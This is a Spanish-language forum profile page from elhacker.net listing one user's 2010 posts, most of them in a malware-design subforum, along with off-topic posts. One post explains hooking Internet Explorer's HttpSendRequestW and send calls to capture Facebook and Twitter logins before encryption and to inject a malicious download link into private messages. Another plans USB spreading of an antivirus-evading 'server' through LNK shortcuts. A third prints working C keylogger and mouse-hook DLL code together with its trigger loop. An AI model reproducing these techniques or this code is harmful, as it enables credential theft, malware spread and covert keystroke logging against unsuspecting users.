elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Análisis y Diseño de Malware / Spradear Facebook y Credenciales de Twetter IEXPLORER en: 19 Noviembre 2010, 05:47 am
  Bueno me decidi husmear en las reds sociales y empece con facebook logrando algo....  :silbar:

  En muchos sitios por alli sobre todo en el blog de YST lei que para intercalar MP en Facebook habria que hookear apis de wininet y  en cierto grado es verdad, si hookeamos la api HttpSendRequestW en IExplorer podemos interceptar las credenciales del facebook antes de pasar por las ssl en el cuarto parametro de la API:

 
Código:
BOOL HttpSendRequest(
  HINTERNET hRequest,
  LPCTSTR lpszHeaders,
  DWORD dwHeadersLength,
  LPVOID lpOptional,
  DWORD dwOptionalLength
);


  Obtenemos una cadena como esta:

Código:
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&email=algunloco@hotmail.com&pass=algunpass&persistent=1&login=Entrar܆µ

  podemos filtrar esta cadena en el hook buscando señas como "charset_test=" y "email=" y guardarla en un archivo o enviarlas directamente por sockets ..  :silbar:

  Pero este no es mi objetivo mi fin es lograr intercalar una URL maliciosa en un MP  :silbar: .......

  Por lo que despues de debbugear y hookear varias apis de wininet decidi hacerlo a la Chuck Norris: "HOOKEANDO SEND" .....  >:D ....

  En el momento de enviar un MP por el fakebook  :silbar: IExplorer realiza un send enviando una cadena como esta:

  
Código:
status=hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

  Como veran despues de status= esta el mensaje con unos feos %20 que sustituyen los espacios si queremos intercalar algun mensaje tendriamos que crear un buffer asi:

Código:
status=Feliz%20dia%20de%20san%20Valentin%20http:\\lamerruso.com\\mibicho.exe%20

 y le concatenamos la cadena original desde &action= quedando algo asi ....

 
Código:
status=Feliz%20dia%20de%20san%20Valentin%20hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

  Y al enviar la cadena lleva la URL intercalada  :silbar: .........

  Con Twetter estaba probando algo con el hook a la api HttpSendRequestW se puede obtener las credenciales filtrando una cadena como esta:

  
Código:
authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&return_to_ssl=&redirect_after_login=&session%5Busername_or_email%5D=twettermaniaco@hotmail.com&session%5Bpassword%5D=semeolvido&commit=Iniciar+Sesi%C3%B3n˜Úª

  se puede filtrar buscando señas y como veran alli estan las credenciales antes de pasar por las ssl  :silbar: .........

  Iva a intentar intercalar twets maliciosos pero por alguna extraña razon la pagina de twetter tiene problemas  :silbar: ......


  PD: No subo source aqui esta la idea  :silbar: no quiero que algun "experto" propague malware asi no mas sin esforzarce XD  :silbar:


  Saludos..  >:D

2  Foros Generales / Foro Libre / Que pasa con el servidor de Indetectables.net ? en: 28 Octubre 2010, 15:40 pm
  Tengo dias que no puedo ingresar ni a la web ni al foro ¿Esta caido?.... Ayer pude ingresar a la web pero habia una pagina en blanco que tenia un bonito mensaje referente a mi trasero  :D ......  :silbar:
3  Seguridad Informática / Análisis y Diseño de Malware / Infeccion de dispositivos USBs mediante archivos LNK en: 26 Octubre 2010, 16:59 pm
  Bueno la era Autorun.inf creo que esta llegando a su fin  :-( en mi proyecto genero un autorun con ofuscacion aleatoria que solo era detectado por 3 AV entre ellos AVAST me parecia bien hasta que probe los 3 AV en otro pc de prueba con mi autorun los otros dos lo unico que hacen es borrar el autorun pero AVAST .... por heuristica  busca la ruta del exe en el autorun y lo detecta como Troyan Horse  :¬¬ no solo eso sino que borra todas las copias del exe en el pendrive  :) y al final aparece una ventanita diciendo si el usuario aceptaria enviar las muestras a AVAST para su analisis  :o si fuera una copia de PI o Biefrost no importara pero mi proyecto es 100% fud y eso no me gustaria para nada ......... Y es por mera heuristica ya que si copio el server en el Pen drive sin el autorun Avast no lo detecta  :P ........

  Me puse a investigar y lei un articulo sobre Stuxnet especificamente sobre la infeccion de dispositivos USB con LNKs y me parecio muy interesante  :rolleyes: basicamente consiste en subir el server a algun webhosting y generar un acceso directo a esa url, ese acceso directo  se podria bindear con el server y cada vez que detecte un Dispositivo copiaria el acceso directo al pendrive con algun nombre llamativo o con algun nombre relacionado con los directorios u archivos del pendrive  :) de alguna manera stuxnet hace que el acceso directo se active cuando se accede al pendrive pero basicamente funciona ...  ;D

   No se si alguien sabra algo mas para compartir? ...

  Saludos ....
4  Seguridad Informática / Análisis y Diseño de Malware / Analisis de Malware al extremo Por Jorge Mieres en: 20 Octubre 2010, 04:38 am
  Bueno soy asiduo lector de este señor y es algo viejo el Paper pero esta muy completo y explicado  :) De muy buena lectura para el que quiere saber como funcionan las cosas y el paper en si da muchas luces para el diseño  :silbar: ......

Código:
http://www.malwareint.com/docs/MalwareInt-anual-2009.pdf


  Espero que les guste  :P
5  Foros Generales / Foro Libre / Ola de Avistamientos ovnis en China ¿Sera una Luz de Venuz?¿o la Aurora Boreal? en: 9 Octubre 2010, 06:39 am
  Bueno hoy en dia hay una ola de avistamientos Ovnis en china asi como en la decada de los 40 y 50 en USA . Mi hipotesis es que esa gente concentra su estudio en las zonas mas desarrolladas ..... Ya ET sabe que USA no es la principal potencia  :xD .......

 http://www.larazon.es/noticia/5454-senores-pasajeros-cerramos-el-aeropuerto-porque-hemos-visto-un-ovni



 

6  Seguridad Informática / Análisis y Diseño de Malware / Problema con UnHookWindowsEx en: 6 Octubre 2010, 19:49 pm
  Tengo problemas con estas funciones ....

DLL
Código
  1.  
  2. LRESULT CALLBACK Filtro(int nCode, WORD wParam, DWORD lParam) {
  3.                if(nCode<0){
  4.                   return(CallNextHookEx(gancho,nCode,wParam,lParam));
  5.                   }
  6.                if (lParam & (1 << 31)) {
  7.                   char path[MAX_PATH];
  8.                   FILE *datos;
  9.                   BYTE KeyboardState[256];
  10.                   GetKeyboardState(KeyboardState);
  11.                   WORD CharValue;
  12.                   strcpy(path,getenv("USERPROFILE"));
  13.                   strcat(path,"\\Shellx64\\SPACK\\KLG.KL");
  14.                   if(ToAscii(wParam,0,KeyboardState,&CharValue,0) > 0){
  15.                       if((datos=fopen(path,"at"))==NULL){
  16.                                  return CallNextHookEx(gancho,nCode,wParam,lParam);
  17.                                  }
  18.                          fprintf(datos,"%c",(char)CharValue);
  19.                          fclose(datos);
  20.                   }
  21.                }
  22.  
  23.                return CallNextHookEx(gancho,nCode,wParam,lParam);
  24. }
  25. LRESULT CALLBACK FiltroMouse(int nCode, WORD wParam, LPARAM lParam)
  26. {
  27.                if(nCode!=HC_ACTION )
  28.                {
  29.                   return(CallNextHookEx(ganchom,nCode,wParam,lParam));
  30.                   }  
  31.                else
  32.                  switch(wParam)
  33.                       {
  34.                       case WM_LBUTTONDOWN:
  35.                           {
  36.                            PMOUSEHOOKSTRUCT MH=(PMOUSEHOOKSTRUCT)lParam;
  37.                            GuardarPosicion(MH->pt.x,MH->pt.y) ;
  38.                            Sleep(200);
  39.                            break;
  40.                             }
  41.                       default:
  42.                         return CallNextHookEx(ganchom,nCode,wParam,lParam);
  43.                      }
  44.  
  45. return CallNextHookEx(ganchom,nCode,wParam,lParam);
  46. }
  47. EXTERN_C __declspec(dllexport)int CreaHook(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
  48.    char path[MAX_PATH];              
  49.      strcpy(path,getenv("USERPROFILE"));
  50.      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
  51.      FILE *datos;
  52.    if(Instala==TRUE) {
  53.                          LoadDllss();
  54.                          if((datos=fopen(path,"at"))!=NULL)
  55.                          {  
  56.                             fprintf(datos,"%s","IniciandoKL");
  57.                             fprintf(datos,"%s",DIRKL);
  58.                             fclose(datos);
  59.                           }
  60.                          gancho=MySetWindowsHook(WH_KEYBOARD,(HOOKPROC)Filtro,DLLInst,0);
  61.  
  62.                          if(gancho==NULL){
  63.                                 return 0;
  64.                          }
  65.                          else{
  66.                                 return 1;
  67.                          }
  68.                     }else{
  69.                         if((datos=fopen(path,"at"))!=NULL)
  70.                          {  
  71.                             fprintf(datos,"%s","TerminandoKL");
  72.                             fprintf(datos,"%s",DIRKL);
  73.                             fclose(datos);
  74.                           }
  75.                         return UnhookWindowsHookEx(gancho);
  76.  
  77.                   }
  78. }
  79. EXTERN_C __declspec(dllexport)int CreaHookMouse(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
  80.       char path[MAX_PATH];              
  81.      strcpy(path,getenv("USERPROFILE"));
  82.      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
  83.      FILE *datos;            
  84.                  if(Instala==TRUE) {
  85.                          LoadDllss();
  86.                           if((datos=fopen(path,"at"))!=NULL)
  87.                          {  
  88.                             fprintf(datos,"%s","IniciandoBKER");
  89.                             fprintf(datos,"%s",DIRKL);
  90.                             fclose(datos);
  91.                           }
  92.  
  93.                          ganchom=MySetWindowsHook(WH_MOUSE,(HOOKPROC)FiltroMouse,DLLInst,0);
  94.  
  95.                          if(ganchom==NULL){
  96.                                 return 0;
  97.                          }else{
  98.                                 return 1;
  99.                          }
  100.                   }else{
  101.                         if((datos=fopen(path,"at"))!=NULL)
  102.                          {  
  103.                             fprintf(datos,"%s","TerminandoBKER");
  104.                             fprintf(datos,"%s",DIRKL);
  105.                             fclose(datos);
  106.                           }
  107.                       return UnhookWindowsHookEx(ganchom);
  108.  
  109.                     }
  110. }

main
Código
  1. main()
  2. {
  3. HMODULE Dll=LoadLibraryA(DIRKL);
  4. Funcion = (LPFuncion)GetProcAddress(Dll,"CreaHook");
  5. FuncionM = (LPFuncionM)GetProcAddress(Dll,"CreaHookMouse");
  6. //INY=new Inyector(INFO->Masterdir ,CFS->RTKNAMEdll,INFO->SoyAdm);
  7. int lp=0;
  8. IniciarKeyLog();
  9. bool banana=false,banana1=false;;
  10. while(1)
  11.    {
  12.  
  13. strcpy(LINKK,"NULL");
  14. strcpy(LINKVINS,"NULL");
  15. EnumWindows((WNDENUMPROC)EnumProc1,lp);
  16. if(strcmp(LINKK,"NULL")!=0&&!banana)
  17.   {
  18. banana=true;
  19. FuncionM(TRUE,Dll,LINKK);
  20.   }
  21.     if(strcmp(LINKK,"NULL")==0&&banana)
  22.   {
  23.        banana=false;
  24. FuncionM(FALSE,Dll,LINKK);
  25.   }
  26. if((strcmp(LINKVINS,"NULL")!=0||strcmp(LINKK,"NULL")!=0)&&!banana1)
  27.   {
  28. banana1=true;
  29. Funcion(TRUE,Dll,LINKVINS);
  30.   }
  31.     if((strcmp(LINKVINS,"NULL")==0&&strcmp(LINKK,"NULL")==0)&&banana1)
  32.   {
  33.        banana1=false;
  34. Funcion(FALSE,Dll,LINKVINS);
  35.   }
  36. Crono1++;
  37. Crono2++;
  38.     Sleep(3000);
  39.     }
  40. return 0;
  41. }
  42.  

  El pedaso de codigo del main es un extracto del main principal de mi programa ....
En si lo que intento hacer es detectar ciertas ventanas y si estan activas activar los hooks todo funciona de maravilla pero me interesa que al momento d eno existir ninguna ventana de interes los hooks sean desinstalados... por cuestiones de optimizacion ....... Pero al momento de cerrar la ventana de interes, la aplicacion desinstala los hooks perfectamente, pero explorer.exe, iexplorer.exe y firefox.exe rebotan unos feos errores que los obliga ha cerrar  :( y ya saben el escandalo que se forma cuando se cierra explorer por lo que esto no me sirve  :¬¬ claro despues de reiniciar los serviciso tanto la dll como el exe siguen trabajando sin problemas y los hooks quedan desinstalados .... Se que hay que pulir un hook para que detecte teclas invisibles como TAB, F1 las flechas y todas esas cosas pero primero quiero que los hooks se instalen y desinstalen a la perfeccion.......

Algun Cable?

  Tambien se puede dejar ese puñal alli metido y no deshokearlos  :laugh: pero eso seria mucha data irrelevante ...

 Saludos ....

  Se que esto va en el subforo de c++ pero he obtenido mas ayuda aqui que en ese subforo  :P
7  Foros Generales / Foro Libre / Navegar en Internet con Windows es como ir a la guerra XD en: 3 Octubre 2010, 06:31 am
  Bueno no se si los usuarios han notado un fuerte crecimiento en paginas infectadas y campañas de propagacion de malware  :-\ .... en una semana he sido infectado 4 veces solo navegando y accidiendo a paginas de "confianza"..

  Explico:

  Hace 5 dias fui victima de un muy picaro worm P2P muy bien elaborado que igual me fue muy facil eliminar...

  Dos dias despues descargue un Pdf y venia con su respectivo regalito ...  ;-) un lindo troyano bancario el cual a las pocas horas de infeccion intente acceder a mis cuentas bancarias y al escribir el sitio del banco en el exploraror me aparecio un lindo cartelito del firewall de windows diciendome que IExplorer necesitaba permisos para "Abrir Puertos"  ;-) ....... Otra vez avira solito se lo cargo ....... 


  Hace dos dias enfrente un monstruo del cual no hay ninguna info en internet, y el puto binario me lo cargue por lo que no pude recojer una muestra  :rolleyes:, la custion empezo al ingresar a una pagina cuyo nombre omito por custiones personales  :silbar: .... lo cierto es que IExplorer Peto por lo que lo termine desde el taskmgr ..... de una vez se me prendio la luz de la desconfianza  :-[ ...... Al rato Avira quedo nockaut , y el firewall de windows quedo desactivado  :-[ de ninguna manera pude reiniciar los dos servicios al ver esto desconecte el modem y lo guarde en una gabeta con llave ...... SO Xp actualizado, avira version completa actualizada  :rolleyes: .. IExplorer 8 actualizado ..... Prosigo reinicie en Modo a prueba de fallos y pude arrancar el avira..... hice un scan dos trollanos de caracteristicas diferentes guardados en appdata, y Userprofile, facil de borrar el tercero era la peor de mis pesadillas un archivo .Sys guardado en %Systemroot%\\drivers detectado por heuristica como TR\Agent586 a lo cual por su puesto avira no pudo borrar .....  :-[ .......

  El archivo se alojo como kijpdhl.sys y creo una llave en HKLM\\Curren controlSet2\\Services ....  con el nombre kijpdhl.sys y claro no podia ver lo que habia dentro ni siquiera como administrador  :-[ ... Lo mas lindo fue al intentar buscar el archivo no podia abrir la carpeta drivers  :-[ para acceder tuve que hacerlo desde cmd y escribiendo la palabra system32 con codigos Alt es decir%%

  Al ver todo esto solo quedo el plan c que tengo para estos casos .... ¿Formatear? pues no 10K canciones bajadas por el emule incontable codigo y documento que no tenia donde meterlos XD .... Asi que desempolve un HD con una version limpia de windows y avira instalado, instale el had y arranque la maquina por alli para luego cargarme el driver ese XD .......

  Sorpresa: al hacer esto los driver de la tarjeta de red quedaron daños y no hubo forma humana de arreglar esto por lo que tuve que reinstalar todos los drivers ......

  El Archivo Kijpdhl.sys pesa 505KB  :o que es demasiado para ser malware asi que debe tener muchos juguetes para entretener a las victimas  :) .......


  Hoy intente leer esta noticia....

Citar

  Y me aparecio un lindo cartelito del IEXPLORER diciendome que mi PC estaba bajo ataque de malware  :-[  :-[ Por lo que estoy corriendo el AV de nuevo  :¬¬....


  Voy a desempolvar una vieja version de OpenSuse, y la instalare en una particion para ver si puedo navegar en paz .....

  Windows esta bajo ataque hoy mas que nunca XD .....
8  Foros Generales / Foro Libre / VENEZUELA: ISPs publicas estan blockeando el acceso a foros de OPOSICION en: 28 Septiembre 2010, 03:42 am
  Bueno eso y despues dicen que tenemos libertad de expresion  :¬¬  .......

  Gracias a dios y existen los proxys .....

 


 



                                                          Tontos de Cantv  :P
9  Seguridad Informática / Análisis y Diseño de Malware / ¿Que es Esto? ¡¡Un Emule Paralelo XD!! en: 21 Septiembre 2010, 19:19 pm
  Ayer estaba huzmeando en la red p2p y encontre un bonito rar con el nombre "Poker Bot"  ;D, lo descargue y pudo mas la Curiosidad que la Precaucion asi que me dije "A ver que hay aqui si me infecto Al diablo" ......

 Aqui una muestra de lo que baje no es el original que baje ayer ya que fue exterminado ...  :silbar: asi que busque un archivo relacionado cuyo nombre  estaba en el code del bicho y aqui esta ...

Citar

  Bueno me quede esperando el cuadro de dialogo e informacion de instalacion de mi "Poker Bot", en vez de eso el instalador abrio el Firefox y me direcciono a una pagina de compras online pero de mi poker Bot nada  :-[ ... Asi que dije "Me jodieron", abri el administrador de tareas (Por lo menos abrio) y alli estaba un lindo proces SYSTEM con el nombre wins.exe, ademas note que cada 10 sg s eejecutaba una cosa llamada 7Zip.exe, eran las 2 am asi que apague la perola y me fui a dormir  .........

  Hoy me levanta encendi el PC y note sierta lentitud, el centro de seguridad de windows estaba en rojo y al abrir estaba el firewall de windows desactivado, y mi AV Avira estaba desactualizado, y desactivado  ;-)... lo primero que hice fue actualizar el AV.., hice un scan detecto el wins.exe pero cuando lo estaba borrando la pc se apago  :¬¬ asi que reinicie en modo a prueba de fallos y lo volvi a correr .......

  Al buscar con regedit el famoso wins.exe estaba instalado como servicio con el nombre Windows Internet Name Service, la cual borre por supuesto y tenia una llave para permisos en el firewall de windows , tambien borrado XD....... Alli vi el Directorio donde estaba esa cosa yo crei que era alguna copia de spynet, Biefrost, sub7 a lo mucho el rxbot pero cuando abro el directorio  :o  :o .....

  

  Vi carpetas como incoming, archivos . meat, nodos.dat  :-[ asi que me di cuenta que esto no era algo normal tiene toda la estructura de un Bot P2P  :-[ Abri la Carpeta Incoming y miren .......

  

  Esa captura fue sepues que pasara el avira por alli, habian por lo menos 100 archivos rar cuyos nombres Ivan desde Hack MSN.rar hasta Conter Strike 1.rar  :silbar:, lo mas raro es que revise el emule y esa carpeta no aparece compartida  :o por lo que intuyo que esa cosa inyecta el emule y envia info de esos archivos para compartir via hooks........

  Luego revise Server.met y encontre esto

  
Citar
à   XP0á     88.80.28.48  88.80.28.48
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    &k¡`5    
 38.107.161.96 
 38.107.161.96
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    Ô?Î#’    
 212.63.206.35 
 212.63.206.35
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    Sé7”     83.233.30.55  83.233.30.55
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    :÷æ’     58.247.5.230  58.247.5.230
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    sïä     115.239.228.194  115.239.228.194
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    U(l‡     85.17.40.108  85.17.40.108
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    Ô³Žˆ     212.179.18.142  212.179.18.142
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    &k .5    
 38.107.160.46 
 38.107.160.46
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    X¿äBÇ    
 88.191.228.66 
 88.191.228.66
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    Ï¶‚Û     207.182.157.130  207.182.157.130
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    u‡‰t¸"     117.135.137.116  117.135.137.116
          users     files             ‡     ˆ     ‰     ‘ Unknown ‘ Unknown ’     ”    

  Si pueden ver alli hay una lista de Ips que seguro estan infectadas y dado el nombre del archivo apuesto que son supernodos y una de esas ha de ser la del BoboMaster  :laugh:......

  Wins.exe es detectado por avira como "TR/ATRAPS G2", y esta cosa instala otro malware "7Zip.exe" que es detectado como "TR/Mowidin G2", No infecta Dispositivos USB ni tampoco ejecutables ........ El archivo nodos.dat esta cifrado  :-( .....

  Al buscar la muestra para subir vi esto ...

  

  Como veran en el circulo se puede ver que hay 561 fuentes disponibles asi que no es muy grande la red si tomamos en cuenta que todas esas pc estan infectadas ..... En mi opinion esta en gestacion  :silbar: ....

  Alli les dejo el binario para ver que mas le pueden sacar  ;-) ........

  No tiene mucho de nuevo lo que me llama la atencion es que es P2P  :o ....

  Saludos ...
10  Foros Generales / Foro Libre / Vi los restos de mi Padre: BOLIVAR en: 18 Julio 2010, 04:33 am
  Bueno ayer en cadena nacional vi la exhumacion del Venezolano mas grande que ha pisado la tierra, la verdad que todo el tiempo veia a BOLIVAR como un mito un personaje en la historia, pero ayer al ver sus restos mortales no pude contener la emocion y varias lagrimas brotaron de mis ojos, y me di cuenta que el no es un mito, el existio y alli esta sus restos mortales su legado hoy esta mas  vigente que nunca  en el mundo y cada palabra y cada carta que el escribio hoy cobra mas vigencicia que nunca. El fue es y sera el gran Latinoamericano que, como el vienen al mundo cada quinientos años....


  Viva mi PADRE el LIBERTADOR de Ameica  :-( ........



  AHORA JOALA Y NUESTRO PADRE HAYA MUERTO DE TUBERCULOSIS, Y NO SEA OTRA COSA POR QUE ¿SI NO? ......   >:D EL ODIO QUE VOY HA TOMAR CONTRA CIERTAS PERSONAS VA HA SER GIGANTESCO  >:D
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines